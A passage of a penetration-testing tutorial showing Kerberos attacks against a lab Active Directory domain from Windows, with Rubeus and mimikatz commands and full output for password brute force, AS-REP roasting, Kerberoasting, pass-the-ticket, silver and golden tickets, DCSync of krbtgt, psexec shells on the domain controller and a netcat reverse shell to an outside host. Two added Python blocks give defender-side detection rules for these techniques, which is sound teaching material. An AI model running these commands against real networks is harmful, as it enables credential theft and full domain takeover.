Attacking Kerberos from Windows

Windows Abuse


In this section, we'll perform the same attacks we demonstrated earlier in this article, but on Windows. Of course, these attacks require you to have shell access to a Windows machine that is part of the domain.


Tools


  • Rubeus (compiled version from the SharpCollections repository)
  • Mimikatz

Note


These tools are often detected by antivirus software, so you must be cautious in real-world scenarios. However, for the purpose of this article, I disabled the antivirus to simplify the process.


Kerberos Brute Force


This technique is not effective for user enumeration because you can retrieve domain user accounts directly using PowerShell:


# Using the net command (built-in)
net user /domain

# Using ActiveDirectory module
Get-ADUser -Filter * | Select-Object SamAccountName

However, password brute-forcing against a list of usernames can still be useful. You can supply both a username list and a password list to perform the brute force attack:


# Providing a users list
.\Rubeus.exe brute /passwords:passwords.txt /users:users.txt /domain:elswixcorp.local /outfile:valid_creds.txt

# For all users in the current domain
.\Rubeus.exe brute /passwords:passwords.txt /outfile:valid_creds.txt

AS-REP Roasting


You can perform AS-REP Roasting using Rubeus:


*Evil-WinRM* PS C:\temp> .\Rubeus.exe asreproast /format:john /outfile:asrep_roast.txt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2


[*] Action: AS-REP roasting

[*] Target Domain          : elswixcorp.local

[*] Searching path 'LDAP://dc01.elswixcorp.local/DC=elswixcorp,DC=local' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
[*] SamAccountName         : peter
[*] DistinguishedName      : CN=peter,CN=Users,DC=elswixcorp,DC=local
[*] Using domain controller: dc01.elswixcorp.local (fe80::2810:e2e3:6669:29d0%8)
[*] Building AS-REQ (w/o preauth) for: 'elswixcorp.local\peter'
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\temp\asrep_roast.txt

[*] Roasted hashes written to : C:\temp\asrep_roast.txt

This command performs an AS-REP Roasting attack against every account in the current domain that does not require pre-authentication (the userAccountControl bit in the LDAP filter above) and saves the retrieved hashes to the asrep_roast.txt file:


*Evil-WinRM* PS C:\temp> cat asrep_roast.txt
$krb5asrep$peter@elswixcorp.local...[snip]...
*Evil-WinRM* PS C:\temp>

You can crack this hash using john.


Kerberoasting


To perform a Kerberoasting attack with Rubeus, you need to provide credentials:


*Evil-WinRM* PS C:\temp> .\rubeus.exe kerberoast /creduser:elswixcorp.local\peter /credpassword:cr4ckthis4n!c% /outfile:hash.txt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : elswixcorp.local
[*] Searching path 'LDAP://dc01.elswixcorp.local/DC=elswixcorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : ellie
[*] DistinguishedName      : CN=ellie,CN=Users,DC=elswixcorp,DC=local
[*] ServicePrincipalName   : http/ellie
[*] PwdLastSet             : 12/19/2024 7:04:52 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\temp\hash.txt

[*] Roasted hashes written to : C:\temp\hash.txt

As shown, the tool identified one kerberoastable account and saved the roasted hash to hash.txt, the file given with the /outfile parameter.


Overpass The Hash/Pass The Key


Rubeus also allows you to authenticate using a hash or key. For example, you can request a TGT from the KDC by providing the NT hash:


*Evil-WinRM* PS C:\temp> .\rubeus.exe asktgt /user:administrator /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /outfile:administrator.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: Ask TGT

[*] Got domain: elswixcorp.local
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'elswixcorp.local\administrator'
[*] Using domain controller: fe80::2810:e2e3:6669:29d0%8:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIF7DCCBeigAwIBBaEDAgEWooIE8DCCBOxhggToMIIE5KADAgEFoRIbEEVMU1dJWENPUlAuTE9DQUyi
...[snip]...
      OFqnERgPMjAyNTAxMDIwNDE5MjhaqBIbEEVMU1dJWENPUlAuTE9DQUypJTAjoAMCAQKhHDAaGwZrcmJ0
      Z3QbEGVsc3dpeGNvcnAubG9jYWw=

[*] Ticket written to administrator.kirbi


  ServiceName              :  krbtgt/elswixcorp.local
  ServiceRealm             :  ELSWIXCORP.LOCAL
  UserName                 :  administrator (NT_PRINCIPAL)
  UserRealm                :  ELSWIXCORP.LOCAL
  StartTime                :  12/25/2024 8:19:28 PM
  EndTime                  :  12/26/2024 6:19:28 AM
  RenewTill                :  1/1/2025 8:19:28 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  3Zk+IPnVyZ0kW85esGiKDw==
  ASREP (key)              :  58A478135A93AC3BF058A5EA0E8FDB71

Here, we successfully obtained a TGT for the administrator account using the /rc4 parameter to provide the NT hash. You can also use an AES-256 key:


*Evil-WinRM* PS C:\temp> .\rubeus.exe asktgt /user:administrator /aes256:30ed0b2f17e5fc76b29402e3da4bd05337abfcdc2a6412d08d6d4e68db070506 /outfile:administrator.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: Ask TGT

[*] Got domain: elswixcorp.local
[*] Using aes256_cts_hmac_sha1 hash: 30ed0b2f17e5fc76b29402e3da4bd05337abfcdc2a6412d08d6d4e68db070506
[*] Building AS-REQ (w/ preauth) for: 'elswixcorp.local\administrator'
[*] Using domain controller: fe80::2810:e2e3:6669:29d0%8:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGDDCCBgigAwIBBaEDAgEWooIFADCCBPxhggT4MIIE9KADAgEFoRIbEEVMU1dJWENPUlAuTE9DQUyi
...[snip]...
      V0lYQ09SUC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQZWxzd2l4Y29ycC5sb2NhbA==

[*] Ticket written to administrator.kirbi


  ServiceName              :  krbtgt/elswixcorp.local
  ServiceRealm             :  ELSWIXCORP.LOCAL
  UserName                 :  administrator (NT_PRINCIPAL)
  UserRealm                :  ELSWIXCORP.LOCAL
  StartTime                :  12/25/2024 8:20:13 PM
  EndTime                  :  12/26/2024 6:20:13 AM
  RenewTill                :  1/1/2025 8:20:13 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  oFBG2IELW1tOcfTyd7NmpgpQk3rDAdJf5c4GnwIC4VE=
  ASREP (key)              :  30ED0B2F17E5FC76B29402E3DA4BD05337ABFCDC2A6412D08D6D4E68DB070506

The TGT was saved as administrator.kirbi. This ticket can now be used for Pass-The-Ticket.
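Every request shown so far leaves a trace on the domain controller: each TGT request is logged as Security event 4768 and each service-ticket request as 4769, and both records carry the encryption type of the issued ticket, while 4768 also carries the pre-authentication type. The Python below is an added example, not code from the article or from Rubeus, that runs three defender-side rules over constructed sample records whose field names follow the Windows Security event schema (TargetUserName, ServiceName, TicketEncryptionType, PreAuthType, Status) and whose values are made up to mirror this lab: a TGT issued without pre-authentication (the AS-REP Roasting run), an RC4 service ticket for an SPN registered on a user account (the Kerberoasting run), and an RC4 TGT for a user account in a domain where AES is the norm (the asktgt /rc4 run, where a bare NT hash was supplied).

```python
"""Triage rules for Kerberos ticket-request audit events (4768 and 4769).

Added example with constructed records; field names follow the Windows
Security log schema, values are made up to mirror the article's lab.
"""

# Ticket encryption types as logged by the KDC (hex in the event text).
ETYPE_NAMES = {
    0x01: "DES_CBC_CRC",
    0x03: "DES_CBC_MD5",
    0x11: "AES128_CTS_HMAC_SHA1",
    0x12: "AES256_CTS_HMAC_SHA1",
    0x17: "RC4_HMAC",
}
RC4_HMAC = 0x17
PREAUTH_NONE = 0      # 4768 PreAuthType 0: "Logon without Pre-Authentication"
KDC_SUCCESS = "0x0"   # Status of a request for which a ticket was actually issued

SAMPLE_EVENTS = [
    # Ordinary logon: AES TGT, timestamp pre-authentication present.
    {"EventID": 4768, "TargetUserName": "alice", "ServiceName": "krbtgt",
     "TicketEncryptionType": 0x12, "PreAuthType": 2, "Status": "0x0"},
    # AS-REP roasting: the account does not require pre-auth, RC4 was requested.
    {"EventID": 4768, "TargetUserName": "peter", "ServiceName": "krbtgt",
     "TicketEncryptionType": RC4_HMAC, "PreAuthType": PREAUTH_NONE, "Status": "0x0"},
    # TGT requested with a bare NT hash: pre-auth succeeded but the TGT is RC4.
    {"EventID": 4768, "TargetUserName": "administrator", "ServiceName": "krbtgt",
     "TicketEncryptionType": RC4_HMAC, "PreAuthType": 2, "Status": "0x0"},
    # Failed request (0x18 = KDC_ERR_PREAUTH_FAILED): nothing was issued.
    {"EventID": 4768, "TargetUserName": "administrator", "ServiceName": "krbtgt",
     "TicketEncryptionType": 0xFFFFFFFF, "PreAuthType": 2, "Status": "0x18"},
    # Kerberoasting: RC4 service ticket for an SPN registered on a user account.
    {"EventID": 4769, "TargetUserName": "peter@ELSWIXCORP.LOCAL", "ServiceName": "ellie",
     "TicketEncryptionType": RC4_HMAC, "Status": "0x0"},
    # Benign: AES service ticket for a computer account (sAMAccountName ends in $).
    {"EventID": 4769, "TargetUserName": "alice@ELSWIXCORP.LOCAL", "ServiceName": "DC01$",
     "TicketEncryptionType": 0x12, "Status": "0x0"},
]


def is_computer_account(sam_account_name):
    """Computer accounts carry a trailing '$'; their long random passwords
    make RC4 tickets for them uninteresting to an offline cracker."""
    return sam_account_name.endswith("$")


def triage(events):
    """Return one finding (technique, account, detail) per suspicious request."""
    findings = []
    for ev in events:
        if ev.get("Status") != KDC_SUCCESS:
            continue  # no ticket was issued; failures belong to other rules
        etype = ev["TicketEncryptionType"]
        etype_name = ETYPE_NAMES.get(etype, hex(etype))
        user = ev["TargetUserName"].split("@")[0]

        if ev["EventID"] == 4768:
            if ev["PreAuthType"] == PREAUTH_NONE:
                findings.append({"technique": "AS-REP roasting", "account": user,
                                 "detail": f"TGT issued without pre-authentication ({etype_name})"})
            elif etype == RC4_HMAC and not is_computer_account(user):
                findings.append({"technique": "RC4 TGT (possible over-pass-the-hash)",
                                 "account": user,
                                 "detail": "pre-auth succeeded but the TGT is RC4; AES expected"})
        elif ev["EventID"] == 4769:
            service = ev["ServiceName"]
            if service.lower() == "krbtgt" or is_computer_account(service):
                continue
            if etype == RC4_HMAC:
                findings.append({"technique": "Kerberoasting", "account": user,
                                 "detail": f"RC4 service ticket for user-account SPN {service}"})
    return findings


def count_by_technique(findings):
    """Summarise findings as {technique: count}."""
    counts = {}
    for f in findings:
        counts[f["technique"]] = counts.get(f["technique"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['technique']}] {f['account']}: {f['detail']}")
```

The RC4 rule needs a per-account baseline before it is alerted on: a client that genuinely supports only RC4, or an account whose msDS-SupportedEncryptionTypes is limited to RC4, produces the same 4768. The Kerberoasting rule is the one the Rubeus notice above hints at: forcing RC4 via /tgtdeleg is what makes the request stand out against an AES-only baseline.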


Pass The Ticket


In the earlier Kerberoasting attack we supplied credentials to obtain tickets. Now we'll use the previously saved TGT instead (Pass-The-Ticket) and repeat the Kerberoasting attack:


*Evil-WinRM* PS C:\temp> .\rubeus.exe kerberoast /ticket:administrator.kirbi /outfile:kerberoasting.txt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2


[*] Action: Kerberoasting

[*] Using a TGT /ticket to request service tickets
[*] Target Domain          : elswixcorp.local
[+] Ticket successfully imported!
[*] Searching path 'LDAP://dc01.elswixcorp.local/DC=elswixcorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : ellie
[*] DistinguishedName      : CN=ellie,CN=Users,DC=elswixcorp,DC=local
[*] ServicePrincipalName   : http/ellie
[*] PwdLastSet             : 12/19/2024 7:04:52 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\temp\kerberoasting.txt

[*] Roasted hashes written to : C:\temp\kerberoasting.txt

You can also use this ticket on Linux. First, download the administrator.kirbi file to your Linux machine. To use it, you need to convert it into the ccache format. Fortunately, Impacket provides a script called ticketConverter.py for this purpose:


elswix@ubuntu$ ticketConverter.py administrator.kirbi administrator.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done

After converting the ticket, export the KRB5CCNAME variable and use psexec.py to gain access to the system:


elswix@ubuntu$ export KRB5CCNAME=administrator.ccache
elswix@ubuntu$ psexec.py dc01.elswixcorp.local -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc01.elswixcorp.local.....
[*] Found writable share ADMIN$
[*] Uploading file FSwxVQJk.exe
[*] Opening SVCManager on dc01.elswixcorp.local.....
[*] Creating service bAch on dc01.elswixcorp.local.....
[*] Starting service bAch.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Silver Ticket


You can generate a Silver Ticket using mimikatz:


*Evil-WinRM* PS C:\temp> .\mimikatz.exe "kerberos::golden /domain:elswixcorp.local /sid:S-1-5-21-1672168468-2738507895-2086515240 /rc4:96A44FFBF8BB1958B54D4D04C9C14F95 /user:administrator /service:MSSQLSVC /target:dc01.elswixcorp.local" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /domain:elswixcorp.local /sid:S-1-5-21-1672168468-2738507895-2086515240 /rc4:96A44FFBF8BB1958B54D4D04C9C14F95 /user:administrator /service:MSSQLSVC /target:dc01.elswixcorp.local
User      : administrator
Domain    : elswixcorp.local (ELSWIXCORP)
SID       : S-1-5-21-1672168468-2738507895-2086515240
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 96a44ffbf8bb1958b54d4d04c9c14f95 - rc4_hmac_nt
Service   : MSSQLSVC
Target    : dc01.elswixcorp.local
Lifetime  : 12/26/2024 1:44:41 PM ; 12/24/2034 1:44:41 PM ; 12/24/2034 1:44:41 PM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!
*Evil-WinRM* PS C:\temp>

This command creates a .kirbi file with the Service Ticket. You can then download it to your Linux machine, convert it to ccache format, and use it for authentication:


elswix@ubuntu$ mssqlclient.py dc01.elswixcorp.local -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(dc01): Line 1: Changed database context to 'master'.
[*] INFO(dc01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (ELSWIXCORP\Administrator  dbo@master)>

Golden Ticket


You can create a Golden Ticket using mimikatz:


*Evil-WinRM* PS C:\temp> .\mimikatz.exe "kerberos::golden /domain:elswixcorp.local /sid:S-1-5-21-1672168468-2738507895-2086515240  /rc4:a88e9a174ee94f60f932fec548a84ccb /user:administrator" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /domain:elswixcorp.local /sid:S-1-5-21-1672168468-2738507895-2086515240  /rc4:a88e9a174ee94f60f932fec548a84ccb /user:administrator
User      : administrator
Domain    : elswixcorp.local (ELSWIXCORP)
SID       : S-1-5-21-1672168468-2738507895-2086515240
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: a88e9a174ee94f60f932fec548a84ccb - rc4_hmac_nt
Lifetime  : 12/26/2024 1:49:23 PM ; 12/24/2034 1:49:23 PM ; 12/24/2034 1:49:23 PM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!
*Evil-WinRM* PS C:\temp>

After creating the ticket.kirbi file, you can download it, convert it to ccache format, and use it for authentication:


elswix@ubuntu$ psexec.py dc01.elswixcorp.local -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc01.elswixcorp.local.....
[*] Found writable share ADMIN$
[*] Uploading file JWnrRWgA.exe
[*] Opening SVCManager on dc01.elswixcorp.local.....
[*] Creating service Ovps on dc01.elswixcorp.local.....
[*] Starting service Ovps.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Windows - Pass The Ticket


So far, we've demonstrated Pass-The-Ticket on Linux. We generated the tickets on the Windows machine, downloaded them to a Linux machine, converted them, and used them for authentication. However, Pass-The-Ticket can also be performed directly on Windows, though it is slightly more complex.


Challenges with Remote Sessions


When using a remote shell like Evil-WinRM, certain limitations arise because the shell runs in a process created by a remote (network) logon, and such processes carry restrictions that can limit attacks.


For instance, even after importing a valid TGT into a remote session, actions like accessing administrative shares (\\dc01\admin$) or performing DCSync attacks may fail. This occurs because remote sessions use Network Logon (logon type 3), which restricts token usage for sensitive operations.


Bypassing Remote Session Limitations


To bypass these restrictions, you must operate within a local process context. A local process does not inherit the same restrictions, enabling full use of Kerberos tickets. You can achieve this using RunasCs.


For example, using the -l 9 option allows you to start a process with logon type 9 (new credentials logon):


*Evil-WinRM* PS C:\temp> .\RunasCs.exe x x -l 9 "C:\Temp\nc.exe -e cmd 192.168.100.2 3001"

Here, I used a netcat binary to send a reverse shell under logon type 9. This method doesn't require valid credentials because it uses the current account context.


Once in a local context, you can re-import your Kerberos ticket using tools like Rubeus or Mimikatz. For example, let's request a TGT for the administrator account using Rubeus:


PS C:\temp> .\Rubeus.exe asktgt /user:Administrator /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /ptt /domain:elswixcorp.local

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'elswixcorp.local\Administrator'
[*] Using domain controller: fe80::2810:e2e3:6669:29d0%8:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIF7DCCBeigAwIBBaEDAgEWooIE8DCCBOxhggToMIIE5KADAgEFoRIbEEVMU1dJWENPUlAuTE9DQUyi
...[snip]...
      Z3QbEGVsc3dpeGNvcnAubG9jYWw=

[+] Ticket successfully imported!

  ServiceName              :  krbtgt/elswixcorp.local
  ServiceRealm             :  ELSWIXCORP.LOCAL
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  ELSWIXCORP.LOCAL
  StartTime                :  12/26/2024 3:10:11 PM
  EndTime                  :  12/27/2024 1:10:11 AM
  RenewTill                :  1/2/2025 3:10:11 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  WED5Phcu4GPzWU1HwtwSog==
  ASREP (key)              :  58A478135A93AC3BF058A5EA0E8FDB71

The /ptt parameter loads the ticket into the cache for future use. Now, let's perform a DCSync attack to extract the credentials of the krbtgt account:


PS C:\temp> .\mimikatz.exe "lsadump::dcsync /user:krbtgt" "exit"
.\mimikatz.exe "lsadump::dcsync /user:krbtgt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:krbtgt
[DC] 'elswixcorp.local' will be the domain
[DC] 'dc01.elswixcorp.local' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   : 
Password last change : 12/17/2024 11:57:32 AM
Object Security ID   : S-1-5-21-1672168468-2738507895-2086515240-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: a88e9a174ee94f60f932fec548a84ccb
    ntlm- 0: a88e9a174ee94f60f932fec548a84ccb
    lm  - 0: 6f5a5f80c2e31dbf2da599d5c3705d91

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 67c5f0ed427922973aae6800acbd6e4a

* Primary:Kerberos-Newer-Keys *
    Default Salt : ELSWIXCORP.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : bef0966dff97c062c510d879447c7266ac6ffade99d812dfa91c3b15749d3aa4
      aes128_hmac       (4096) : bec46706fc7f841fa1123cbc7de78cad
      des_cbc_md5       (4096) : 629194cdad08d9e5
...[snip]...

mimikatz(commandline) # exit
Bye!
PS C:\temp>

As shown, the attack was successful, and we retrieved the krbtgt account credentials.
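DCSync is a directory replication request, so the domain controller can audit it like any other access to the domain object: with the Directory Service Access subcategory enabled, each replication call produces a Security event 4662 whose Properties field names the extended right being exercised. The Python below is an added example, not code from the article or from mimikatz, that flags 4662 records exercising the replication rights from a subject that is not a domain controller. The GUIDs are the fixed schema identifiers of those rights; the records, the allow-list of DC accounts and the placeholder GUID in the benign record are constructed.

```python
"""Flag directory-replication access (DCSync) in Security event 4662.

Added example, not from the article or mimikatz.  Needs the
"Audit Directory Service Access" subcategory enabled on the DCs.  Records
are constructed; field names follow the 4662 schema (SubjectUserName,
Properties, AccessMask).
"""
import re

# Extended rights that a replication (DRSUAPI GetNCChanges) call exercises.
# These GUIDs are the fixed schema identifiers of the rights.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit set when an extended right is exercised

# Constructed allow-list: the domain controllers of this lab. Add any
# directory-synchronisation service accounts your environment really uses.
EXPECTED_REPLICATORS = {"dc01$", "dc02$"}

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.IGNORECASE)

SAMPLE_4662 = [
    # Normal replication between domain controllers.
    {"SubjectUserName": "DC02$", "AccessMask": 0x100,
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account pulling secrets from the domain object (the dcsync run above).
    {"SubjectUserName": "administrator", "AccessMask": 0x100,
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Benign property read; the GUID is a constructed placeholder.
    {"SubjectUserName": "peter", "AccessMask": 0x10,
     "Properties": "%%7685 {00000000-0000-0000-0000-000000000000}"},
]


def replication_rights_in(properties):
    """Names of the replication rights referenced in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events, expected=EXPECTED_REPLICATORS):
    """Return {subject, rights} for each replication access by an unexpected subject."""
    findings = []
    for ev in events:
        if not ev["AccessMask"] & CONTROL_ACCESS:
            continue                                  # not an extended-right access
        rights = replication_rights_in(ev["Properties"])
        if not rights:
            continue                                  # some other extended right
        subject = ev["SubjectUserName"]
        if subject.lower() in expected:
            continue                                  # DC-to-DC replication
        findings.append({"subject": subject, "rights": rights})
    return findings


if __name__ == "__main__":
    for f in detect_dcsync(SAMPLE_4662):
        print(f"{f['subject']} exercised {', '.join(f['rights'])}")
```

Get-Changes-All is the right that returns secrets, so a hit that includes it is the one to escalate. The preventive counterpart is to audit who holds these rights on the domain object; anything beyond the domain controllers' own accounts (and any synchronisation account you knowingly deployed) is a finding on its own, and after a confirmed krbtgt dump the krbtgt password has to be reset twice before forged TGTs stop validating.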


This concludes the article. You can find the conclusion in the main document.